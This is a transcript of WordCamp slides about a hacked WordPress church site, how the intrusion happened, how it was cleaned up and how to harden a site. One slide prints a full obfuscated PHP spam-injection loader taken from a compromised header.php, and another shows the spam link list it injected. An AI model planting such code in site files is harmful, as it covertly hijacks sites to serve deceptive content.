google says you shouldn’t visit my church wcgr
DESCRIPTION
Justin Jones speaking about WordPress website security at WordCamp Grand Rapids, August 18, 2012TRANSCRIPT
Google Says You Shouldn’t Visit My Church
A Tale of How My Site Got Hacked, Why It Was My Fault, and What I Did To Fix It
Justin Jones • Fort Wayne, IN @jjonesftw
I’m Justin Jones
0Teacher0Church Worker0WordPress hobbyist0Podcast cohost at
“The Weekly Theme Show” http://wpcandy.com
0@jjonesftw0 justinjones.net
Why would someone want to hack my site?
0The world doesn’t revolve around you0 Crime of opportunity0 Don’t leave your front door unlocked
Why would someone want to hack my site?
0 Imperva selected 50 sites at random, July 2012:0 Expect attack incidents 120 days per year (33%) of the
time, some can experienced 292 days (80%)0 Attacked 274 times per year0 Attack campaigns averages 7 minutes 42 seconds, can
range upward from there0 SQL Injection is the most frequent attack
Why would someone want to hack my site?
0 “Black Hat” SEO0 Hidden links, footer credit links, back links, etc…
0To make money directly0 Affiliate sales0 Rogue virus scanners
Why would someone want to hack my site?
0Serve up images and content for SPAM email
Why would someone want to hack my site?
What do they do while they’re poking around my site?
0Alter robots.txt, .htaccess0 Some are specific to “robots” or HTTP Referrer
0Create backdoors in unsuspecting .php files0Add their own .php files and images to serve up their
payload content
What do they do while they’re poking around my site?
0 Inject code into theme files, like header.php<? //1234$GLOBALS['_2008634924_']=Array('error_re' .'porting','function_e' .'xi' .'st' .'s','fop' .'e' .'n','fwrite','' .'f' .'clos' .'e','' .'s' .'trstr','strtolower','ex' .'p' .'lode','ip2long','i' .'p2l' .'ong','l' .'ong2ip','ip2long','' .'fi' .'le_exists','pre' .'g_mat' .'ch','file_ge' .'t_contents','pr' .'eg_match','f' .'i' .'le' .'_get' .'_c' .'ont' .'ent' .'s','u' .'nseriali' .'ze','count','range','a' .'rra' .'y_splice','array_' .'values','preg' .'_matc' .'h','file' .'_get_' .'contents','un' .'ser' .'ial' .'iz' .'e','gzuncompress','base' .'64_deco' .'de','' .'str' .'len'); function _1572011439($i){$afa=Array('Ym90a28=','ZmlsZV9wd' .'XRf' .'Y2' .'9ud' .'GV' .'udHM=','dw==','Z29v' .'Z' .'2' .'xl','c2x' .'1cnA=','' .'bXN' .'uY' .'m' .'90','Yml' .'u' .'Z2JvdA==','Ym90','Y' .'3' .'Jhd2' .'w' .'=','' .'c3BpZGV' .'y','cm9' .'ib3Q=','' .'SH' .'R0cENsaWVudA=' .'=','' .'Y3' .'V' .'y' .'b' .'A' .'==','' .'c2' .'Nvb3Rlcg==','d3d3c3' .'Rlcg==','' .'UHl0aG9' .'u','' .'dX' .'J' .'sb' .'Gli','cG' .'Vyb' .'A=' .'=','bGlid3d3','b' .'HlueA==','VkIgUHJva' .'mVjd' .'A=' .'=','U' .'Hl0aG' .'9uLXVybGxpYi8yL' .'j' .'Y=','TW9' .'6a' .'Wx' .'sYS' .'82N' .'jYuKD' .'Y' .'p','TW9' .'6' .'aWxs' .'YS80L' .'jAgK' .'GNvbXB' .'hdGli' .'b' .'G' .'U7IE1' .'TS' .'UUgNi4w' .'OyBXa' .'W5kb3dzIE5UIDUuMS' .'k=','T' .'W96aWx' .'sYS' .'8' .'0LjA' .'g' .'KGNv' .'bX' .'Bh' .'dGl' .'i' .'bGU' .'7KQ==','' .'TW96aWxsYS80' .'LjAgK' .'GNvbXB' .'hdGlibG' .'U7IE1TSUUgNS4w' .'MDsg' .'V' .'2luZG' .'93cyA5OCk=','' .'TW' .'96' .'aWxsYS8' .'0LjAgKG' .'NvbXBhdGlibG' .'U7I' .'E' .'1' .'TSUUg' .'N' .'i4wO' .'yBX' .'aW5' .'kb3dzIE5UIDUuMTsg' .'U1YxK' .'Q' .'==','' .'TW96' .'aWxs' .'YS80' .'LjAg' .'KGNvb' .'X' .'Bh' .'dGlibGU7IE' .'1TSUUgN' .'i4wOyBXaW5kb3dzIE5UIDU' .'uMTsgLk5FV' .'C' .'BDTF' .'IgM' .'S4wL' .'jM' .'p','Lw==','Lm' .'N' .'vcmU' .'=','fDxpc' .'D4oLiopPC9pc' .'D58VWl' .'z','LmNvcmU=','' .'fDx' .'p' .'cD4' .'oLiopPC9pc' .'D58V' .'W' .'lz','bGlj' .'ZW' .'5zZ' .'S50eH' .'Q=','U' .'kVNT1RF' .'X0' .'FERFI=','SF' .'R' .'U' .'UF9VU0' .'VSX0FH' .'RU' .'5U','Ym90' .'a2' .'8=','fDx' .'pbnQ+KC4q' .'K' .'T' .'wv' .'aW50Pnx' .'VaX' .'M=','bGljZW5zZS50' .'eHQ=','' .'UkVR' .'VUV' .'TVF9VUkk=','' .'PGJ' .'yPg' .'==');return base64_decode($afa[$i]);} if(isset($_GET[_1572011439(0)])){}else{$GLOBALS['_2008634924_'][0](0);}if(!$GLOBALS['_2008634924_'][1](_1572011439(1))){function l__0($_0,$_1){$_2=@$GLOBALS['_2008634924_'][2]($_0,_1572011439(2));if(!$_2){return false;}else{$_3=$GLOBALS['_2008634924_'][3]($_2,$_1);$GLOBALS['_2008634924_'][4]($_2);return $_3;}}}function l__1($_4){$_5=array(_1572011439(3),_1572011439(4),_1572011439(5),_1572011439(6),_1572011439(7),_1572011439(8),_1572011439(9),_1572011439(10),_1572011439(11),_1572011439(12),_1572011439(13),_1572011439(14),_1572011439(15),_1572011439(16),_1572011439(17),_1572011439(18),_1572011439(19),_1572011439(20),_1572011439(21),_1572011439(22),_1572011439(23),_1572011439(24),_1572011439(25),_1572011439(26),_1572011439(27));foreach($_5 as $_6){if($GLOBALS['_2008634924_'][5] ($GLOBALS['_2008634924_'][6]($_7),$_6)){return($_6);}}return(false);}function l__2($_8,$_9){$_10=$GLOBALS ['_2008634924_'][7](_1572011439(28),$_8);$_11=$GLOBALS['_2008634924_'][8]($_10[0]);$_12=$GLOBALS['_2008634924_'][9]($_10[1]);$_13=$GLOBALS['_2008634924_'][10]($_12)== $_10[1]?$_12:0xffffffff <<(32-$_10[1]);$_14=$GLOBALS['_2008634924_'][11]($_9);return($_14&$_13)==($_11&$_13);}function l__3($REMOTE_ADDR){if($GLOBALS['_2008634924_'][12](_1572011439(29))){$GLOBALS['_2008634924_'][13](_1572011439(30),$GLOBALS['_2008634924_'][14](_1572011439(31)),$_15);}else{$GLOBALS['_2008634924_'][15](_1572011439(32),$GLOBALS['_2008634924_'][16](_1572011439(33)),$_15);}$_16=$GLOBALS['_2008634924_'][17]($_15[1]);foreach($_16 as $_9){if(l__2($_9,$REMOTE_ADDR))return true;}return false;}function l__4($_17,$_18){$_19=($_17*25173+13849)%$_18;return (int)$_19;}function l__5($_20,$_21,$_18){$_22=array();$_23=$GLOBALS['_2008634924_'][18]($_20);if($_23<$_18){return false;}$_24=$GLOBALS['_2008634924_'][19](0,$_23-1);$_21=$_21%$_23;for($_25=0;$_25<$_18;$_25++){$_26=l__4($_21,$_23--);$_22[]=$_20[$_24[$_26]];if(!$_23){break;}$GLOBALS['_2008634924_'][20]($_24,$_26,1);$_24=$GLOBALS['_2008634924_'][21]($_24);$_21=$_26;}return $_22;}$_27=l__3($_SERVER[_1572011439(34)]);$_28=l__1(@$_SERVER[_1572011439(35)]);if($_27 or isset($_GET[_1572011439(36)])or $_28){$GLOBALS['_2008634924_'][22](_1572011439(37),$GLOBALS ['_2008634924_'][23](_1572011439(38)),$_29);$_30=$GLOBALS['_2008634924_'][24]($GLOBALS['_2008634924_'][25]($GLOBALS['_2008634924_'][26]($_29[1])));$_31=l__5($_30,100+$GLOBALS['_2008634924_'][27]($_SERVER[_1572011439(39)]),75);for($_25=0;$_25<75;$_25++)echo $_31[$_25] ._1572011439(40);} //1234?>
What do they do while they’re poking around my site?
0 Inject code into theme files, like header.php<a href="http://oakhurstchurch.com/news/index.php?p=alison-carroll-hot">alison carroll hot</a><br><a href="http://oakhurstchurch.com/news/index.php?p=jessica-lowndes">Jessica Lowndes</a><br><a href="http://oakhurstchurch.com/news/index.php?p=zelda-williams">zelda williams</a><br><a href="http://oakhurstchurch.com/news/index.php?p=bush">bush</a><br><a href="http://oakhurstchurch.com/news/index.php?p=teresa-scanlan">Teresa Scanlan</a><br><a href="http://oakhurstchurch.com/news/index.php?p=leyla">leyla</a><br><a href="http://oakhurstchurch.com/news/index.php?p=heather-mills">Heather Mills</a><br><a href="http://oakhurstchurch.com/news/index.php?p=keshia-knight-pulliam-polly">keshia knight pulliam polly</a><br><a href="http://oakhurstchurch.com/news/index.php?p=moira-kelly-biography">moira kelly biography</a><br><a href="http://oakhurstchurch.com/news/index.php?p=smurfs">smurfs</a><br><a href="http://oakhurstchurch.com/news/index.php?p=laurene-jobs">Laurene jobs</a><br><a href="http://oakhurstchurch.com/news/index.php?p=bransales-importadora">bransales importadora</a><br><a href="http://oakhurstchurch.com/news/index.php?p=boo-boo-stewart">boo boo stewart</a><br><a href="http://oakhurstchurch.com/news/index.php?p=irina-shayk-y-cristiano-ronaldo">irina shayk y cristiano ronaldo</a><br><a href="http://oakhurstchurch.com/news/index.php?p=vanessa-angel">Vanessa Angel</a><br><a href="http://oakhurstchurch.com/news/index.php?p=lineas-del-metro-mexico-df">lineas del metro mexico df</a><br><a href="http://oakhurstchurch.com/news/index.php?p=brian-urlacher">brian urlacher</a><br><a href="http://oakhurstchurch.com/news/index.php?p=jessie-palmer">jessie palmer</a><br><a href="http://oakhurstchurch.com/news/index.php?p=jessie-palmer">Jessie Palmer</a><br><a href="http://oakhurstchurch.com/news/index.php?p=mark-hamill-before-and-after-crash">mark hamill before and after crash</a><br><a href="http://oakhurstchurch.com/news/index.php?p=jessica-jane-clement">jessica-jane clement</a><br><a href="http://oakhurstchurch.com/news/index.php?p=ashanti">ashanti</a><br><a href="http://oakhurstchurch.com/news/index.php?p=linea-del-metro-ciudad-de-mexico">linea del metro ciudad de mexico</a><br><a href="http://oakhurstchurch.com/news/index.php?p=lady-antebellum-photos">lady antebellum photos</a><br><a href="http://oakhurstchurch.com/news/index.php?p=heidi-range">heidi range</a><br><a href="http://oakhurstchurch.com/news/index.php?p=miley-cyrus-nude">miley cyrus nude</a><br><a href="http://oakhurstchurch.com/news/index.php?p=elizabeth-hurley">elizabeth hurley</a><br><a href="http://oakhurstchurch.com/news/index.php?p=ty-pennington-girlfriend">Ty Pennington Girlfriend</a><br><a href="http://oakhurstchurch.com/news/index.php?p=lsm05">lsm05</a><br><a href="http://oakhurstchurch.com/news/index.php?p=ls-magazine-pics">ls magazine pics</a><br><a href="http://oakhurstchurch.com/news/index.php?p=megan-mullally-naked">megan mullally naked</a><br><a href="http://oakhurstchurch.com/news/index.php?p=ls-model">ls model</a><br><a href="http://oakhurstchurch.com/news/index.php?p=mensagens-lindas">mensagens lindas</a><br><a href="http://oakhurstchurch.com/news/index.php?p=justin-bieber-bulge">justin bieber bulge</a><br><a href="http://oakhurstchurch.com/news/index.php?p=lg-esteem-review">lg esteem review</a>
How Do They Get In?
0Outdated versions of WordPress0Outdated themes and plugins0Hosting providers behind the times0 Insecure password / brute force0Compromised computer
0 Passwords cached in FTP clients, passwords stored in an unencrypted text file etc…
0Unsecure internet connection0 Rogue access points0 Packet sniffers on public WiFi
What are the consequences?
0Google will punish you.0 Google Safe Browsing or manual removal action
What are the consequences?
0Google will punish you.0 Google Safe Browsing or manual removal action
What are the consequences?
0Google will punish you.0 Google Safe Browsing or manual removal action
What are the consequences?
0Google will punish you.0 Google Safe Browsing or manual removal action
What are the consequences?
0Google will punish you.0 Google Safe Browsing or manual removal action
What are the consequences?
0Other “blacklisting” like Norton Safe Web, Phish Tank, Opera, Sucuri, and many others
0Spammy content will get indexed with every search engine0 Don’t forget about directory listing sites, like Google
Places / Google Maps0Your host may dump you for violating TOS
What are the consequences?
0Be a good neighbor! Security is everyone’s responsibility
What are the consequences?
0Malware cost the US economy 2.2 billion dollars in lost productivity in 2011
0Are you an ecommerce site?0 Payment gateway is probably offsite, but what about
people’s email addresses?0Membership site?
0 Many people re-use passwords0 Linked In, Last.fm, many others recently
0Business or organization?0 How much street cred will you earn serving content
from exotic-dildos.co.cc
Is WordPress insecure?
0No.0Pharma hack had a patch out before exploited0WordPress has a target on its back
0 WordPress is used by over 14.7% of Alexa Internet's "top 1 million" websites and as of August 2011 manages 22% of all new websites.
0Some theme and plugin authors are lazy/sloppy, or use depreciated/inefficient methods
0You are your own worst enemy!0 Think about Windows XP back in like 2002
Is WordPress insecure?
0Be careful who you trust0 Everyone is a “developer” now0 NEVER download and install a theme for free that you
should have paid for0Shady scraper sites, torrents, etc…
0 “Having a website *should* cost you more than $300 a year. If it doesn’t, then you’re doing it wrong.” --Otto
Is WordPress insecure?
0Be careful who you trust0 Be very wary of downloading a free theme outside of the
WordPress.org theme repo0Use “Theme Authenticity Checker” and “Theme Check”0Siobhan McKeown at WPMU.org Google’d “free wordpress
themes”0 Top 10 results: 1=wordpress.org; 1=poorly coded; 8=actively using
encrypted code to insert spammy links
0 Use trusted theme marketplaces or commercial shops
Is WordPress insecure?
0Be careful who you trust0 Choose plugins carefully
0Trusted commercial plugin shops0WordPress.org directory
0 More plugins != insecure0 Check user ratings0 Support forum requests0 Check community blogs0 WordPress.org profile pages for favorites and others by same author
Is WordPress insecure?
Is WordPress insecure?
Is WordPress insecure?
Is WordPress insecure?
Prepare for Disaster
0 It’s going to happen0Maintain regular
backups0 Server side or Plugins
0Be registered with Google Webmaster Tools
0Know how to contact your hosting provider
0Know a developer0Visit your site0Watch your stats
Update. Update. Update.
0 Source: http://churchm.ag/wordpress-updates/
Update. Update. Update.
0August 2011, so 3.2.1 was most current
0Less than half of the top 100k sites running WordPress were up to date!
0WordPress interates quickly to patch security holes. Keep updated to benefit from their work
0 Source: http://churchm.ag/wordpress-updates/
Update. Update. Update.
0WordPress core, .org plugins and .org themes can use the core update functionality
0Some commercial theme and plugins have their own way of one click upgrade, some are manual only
0Some have notifications, some don’t
0Sign up for WordPress.org release notifications from download page
Here’s Where This Gets Technical
0 I’ll have these slides up on Slide Share
0 I’ve reserved time at the end for questions, and I’ll be available after for individual questions
It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?0Take a deep breath and crack open a beer. You’ve got
some work ahead of you.0Get back control of your site0Get the site offline if you can!
It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?0Change *every* single one of your passwords
0 Domain registrar, hosting account, all WordPress users, SQL database username and password, FTP account password
0 I suggest changing your email account passwords0Hire a professional
0 Check out http://sucuri.net/0 Many others out there, Google them up!
It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?0 Regenerate WordPress secret keys / salts
0 Manually in wp-config.php or use a plugin
define('AUTH_KEY', 'n%foh;/v6$)0<t]=Be]o~2L?nopubK;b1-P(x=~dCyY[pL]^Ry//=I$y.w-8&HGP');define('SECURE_AUTH_KEY', 'q#h,K.OZ=-IT)(-`3`)G1Kr-&ZP,!CEM1<sMx-1eDI<H*BfO2G@~ bD<)]8rW|{/'); define('LOGGED_IN_KEY', 'Vuvu|_`AGu@) >*7K~l]B1v-d3-e}<Qo#hki8Fy(Bov:T~wOm#8hqHZbWP2khxR}');define('NONCE_KEY', 'B&8:S*:tZR700I9]3~sWI0Rv1+9e_O{KXcc+`a!eB-wV$+Cctv$q*Yb+c.5w<xns');define('AUTH_SALT', 'bpx*[xMhU<FjufQ*``oc&NNdvz,-FJ=|~+$G:i9qaCFRY>u,-}%-Cc-G|!5r0|D@');define('SECURE_AUTH_SALT', 'S+C/f6B6[Y+uGJt!@K|c:49tA}xB!5_zE6RZ+ AT.bsFNvD^-YGOI@HG8V:YbR?q');define('LOGGED_IN_SALT', '~oP,M4HQ8 ,M$<A[(`HZ@>_BC,Yo/Y].kw+{g^KnLPzB[UAI_Z6h6M+KbZ|.|<$-');define('NONCE_SALT', 'KW*LbM<2qL7LAZZ!vdto?c?!(5eSb)|o$BA;{F-CLZB=M%_QfbdW[@lSDT_]ImE[');
It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?0Backup0Restore from a previous backup0Find and delete all the junk they added
0 Very insidious. Creating rogue sitemaps, modifying .htaccess files, creating backdoors, adding index.php files to override permalinks, etc…
0 Posts and images now in database0Reinstall WordPress core, plugins and themes
It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?0Begin the process of restoring your good name
0 Request delisting of bogus content from Google and other search engines0Very tedious, manual process
0 Request reevaluation from blacklisting services0 Don’t forget about other services that pull content from
your site, like Google places0 Wait it out. This will take weeks and months
0Prepare better for next time
Harden Your Site.The Easy Stuff.
0Keep up to date! WordPress, plugins, themes – but also PHP version on your host
0Use strong passwords – no words! Not P@$$woRd either.0 Consider using a password manager
0Remove “admin” user
Harden Your Site.The Easy Stuff.
0Only connect using SFTP0Never ever hack core WordPress files0Keep a clean house!
0 Other WP installs, other PHP services, plugins, old themes
0Disable user registration
Harden Your Site.The More Complicated Stuff.0Store your wp-config file outside of public_html
0 Done at install or can be moved later0Change the database prefix0Use strong database passwords0Use proper 755 file permissions
0 If a plugin or theme asks you to set 777, avoid.0Only log in to site using SSL (https://...)
Harden Your Site.The More Complicated Stuff.0Plugins! Plugins! Plugins!
0 Monitor core / template files0 “WordPress File Monitor Plus”
0 Scan template files for suspicious code0 “AntiVirus”
0 WP and server security settings0 “WebsiteDefender WordPress Security”
0 Keep up to date0 “Update Notifications”
Harden Your Site.The More Complicated Stuff.0Plugins! Plugins! Plugins!
0 “WordPress Firewall 2”0 “Block Bad Queries”0 Backup
0VaultPress0BackupBuddy
0 Login Lockdown0Lock out excessive retries and mask login errors
0 Many others available for two factor auth, etc…0 Sucuri plugin has a firewall to block known bad IP’s
Should you really be hosting your own site?
0Do you like to change your own oil in your car or take it to the Jiffy Lube?
0WordPress.com is a great resource for most personal bloggers. Focus on writing your content.
0Consider a WordPress managed host.0 WP Engine, ZippyKid, Pagely, etc…
0Don’t be afraid to pay someone!0 How important is this project?0 What is your time worth?
Resources
0Codepoet.com 0 eBook “Locking Down
WordPress”
Resources
0These slides on Slide Share0Search for slides from Dre Armeda and Brad Williams0WordPress.org Codex0Otto on WordPress0Sucuri.net – service and blog0Lockdown WordPress – A Security Webinar with Dre
Armeda0 1.5 hour interview – great resource!
0Countless plugins on the WordPress.org repo0http://sitecheck.sucuri.net/scanner/
Questions?
0No question is stupid. We’re all here to learn!
0 If you’re smarter than I am, please jump in here.